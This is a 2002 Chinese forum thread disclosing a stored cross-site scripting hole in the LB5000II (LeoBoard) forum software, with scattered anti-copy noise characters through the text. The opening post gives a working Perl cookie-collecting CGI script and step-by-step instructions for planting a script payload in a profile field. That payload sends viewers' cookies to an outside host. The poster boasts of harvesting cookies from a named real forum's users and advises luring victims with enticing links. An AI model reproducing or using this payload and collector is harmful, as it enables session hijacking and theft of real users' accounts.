查看: 8622|回复: 3

雷傲跨站脚本漏洞收集用户cookie漏洞,适合与任何版本,任何系统

[复制链接]
发表于 2002-6-6 11:05:22 | 显示全部楼层 |阅读模式
漏洞描述:
2 V, n6 T! P" K+ S  LB5000II是国内流行的CGI程序之一,是在Ikonboard的基础之上改进的,目前最新 & @6 o5 q( L  V
版本是LB5000II v20317b,可以http://www.leoboard.com下载。
; y) G9 ^" z3 y, z, [  其注册模块未过滤用户资料   最高学历:职业状况:等注册信息
6 o. m0 m, U, ~7 y* Y& q, c导致恶意用户可以通过伪造<s cript>alert(documents.cookie)</s cript>
% ]# `" M, Z& h* @9 u进行攻击,进一步可以通过某中方式收集。测试通过
; B6 l- k3 C* {8 x" t3 @测试程序:
9 `4 a" i, o$ _0 P" k# t  参考漏洞描述。
! T0 f$ E8 x( f" P. X4 I解决方案: $ z2 l" |7 x0 e3 C5 r0 j, Q6 H
  对用户提交的资料进行过滤
. f9 B; X0 w  f/ i- \& `: C- Y   
3 K8 t$ `! X( E" _
6 z7 k9 `- }1 `$ F9 t* o6 Z4 A* D$ i请在s8s8论坛访问
1 K! ~/ a3 S5 r3 q/ w. chttp://www.leothreads.com/cgi-bin/profile.cgi?action=show&member=大刀队
) G' @  u& ^/ _' t那么你在s8s8.net 的cookie将被我所获取.
6 ~9 y) _8 r  k" {#!/usr/bin/perl
9 I7 l/ p' F% v( B( H$ m#leo.cgi ! X# O( A  c" g, f, V1 ~0 ^
$url="http://www.s8s8.net";; 1 B7 j/ b: }0 T  U, v1 v7 i" ?, m
$method=$ENV{"REQUEST_METHOD"}; 3 e7 m$ s' X- X. {2 x
if(lc($method) eq "get"){$buffer=$ENV{"QUERY_STRING"};} 9 S  [. ?2 S: B, D( j
else{read(STDIN,$buffer,length($ENV{"CONTENT_LENGTH"}));} / X0 X7 J% L/ Q
$remote_addr=$ENV{"REMOTE_ADDR"};
, s  _- N$ t4 S+ L  p: Z$buffer=~tr/+/ /; , J5 j) [7 @9 ]7 r& |8 z: S7 B
$buffer=~s/%([\dA-Fa-f0-9][\dA-Fa-f0-9])/pack("C",hex($1))/eg; & E, I+ K0 q  f! p) `
$buffer=$buffer."|$remote_addr\n"; . l& I* y. P% i! i" f4 H
open(FILE,">>leo.txt"); 7 G8 G1 j% Q- ]' D
print FILE $buffer; 6 m) E% \! [  M& `( I
close(FILE);                       
" r1 O7 P8 t; ?8 b8 Zprint "Location:$url\n\n";
) l5 y' y( \7 A2 {* [上面是我的cookie收集脚本 : s4 u5 M; G8 J% T- E
------------------------------------------------------------------------------
6 M2 e! K9 T! F% x) A7 ~范例:以s8s8为例,感谢好友狩猎者 shocknet 帮助测试
9 n4 e! E' ^6 g用大刀队登陆s8s8论坛,编辑个人资料, + n/ @) H$ j6 [* ~* F
用记事本打开编辑网页
8 `, ?0 s7 G0 g<option value="中专">中专</option>  这一项改成
" \/ r9 _6 S$ Q3 Q8 {- q<option value="<s cript>window.open('http://enter.3322.net/cgi-bin/info/leo.cgi?&#39;+documents.cookie)</s cript>">中专</option>   * t( e/ O/ X. t0 W: p. }
9 @7 \9 n* D2 F& T: i
编辑<FORM action="profile.cgi" method=post name="creator" enctype="multipart/FORM-data">
3 u  t; u+ j0 D7 }/ v改为   c8 ]# W% O" ^) [
<FORM action="http://www.leothreads.com/cgi-bin/profile.cgi"; method=post name="creator" enctype="multipart/FORM-data">
" X& D+ e- O7 |保存编辑的网页,用自己的页登陆,选“中专”一项,提交数据, : ^1 X4 e. ^( q3 e. w
这样以后只要查看大刀队的资料的用户,那么查看者的cookie资料将被截获。
; v8 d& W( x, r- F: z/ e5 q为了伪装的更好,可以在论坛发具有诱惑力的帖子连接,吸引人家去点击,
4 o# Q: _  P5 [; ?什么算诱惑力呢,自己发挥吧。+ N! N9 |- u2 @) T, h
发表于 2002-6-8 12:21:09 | 显示全部楼层

雷傲跨站脚本漏洞收集用户cookie漏洞,适合与任何版本,任何系统

我连怎么设置超连接都不懂~~~汗~!能教教我吗?7 W# `, ^4 |/ N4 G; ~( S
(我指在贴上设置)
1 ^% m* Q( B( e' _
发表于 2002-6-24 19:03:26 | 显示全部楼层

雷傲跨站脚本漏洞收集用户cookie漏洞,适合与任何版本,任何系统

我们的论坛虽然是使用这个程序!但没这个问题!0 k, q5 E) w2 [, y
 楼主| 发表于 2002-6-25 11:25:20 | 显示全部楼层

雷傲跨站脚本漏洞收集用户cookie漏洞,适合与任何版本,任何系统

那当染好了啊
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

关闭

站长推荐上一条 /1 下一条

相关侵权、举报、投诉及建议等,请发 E-mail:yesdong@qq.com

Powered by Discuz! X5.0 Licensed © 2001-2026 Discuz! Team.44152102000001

在本版发帖QQ客服返回顶部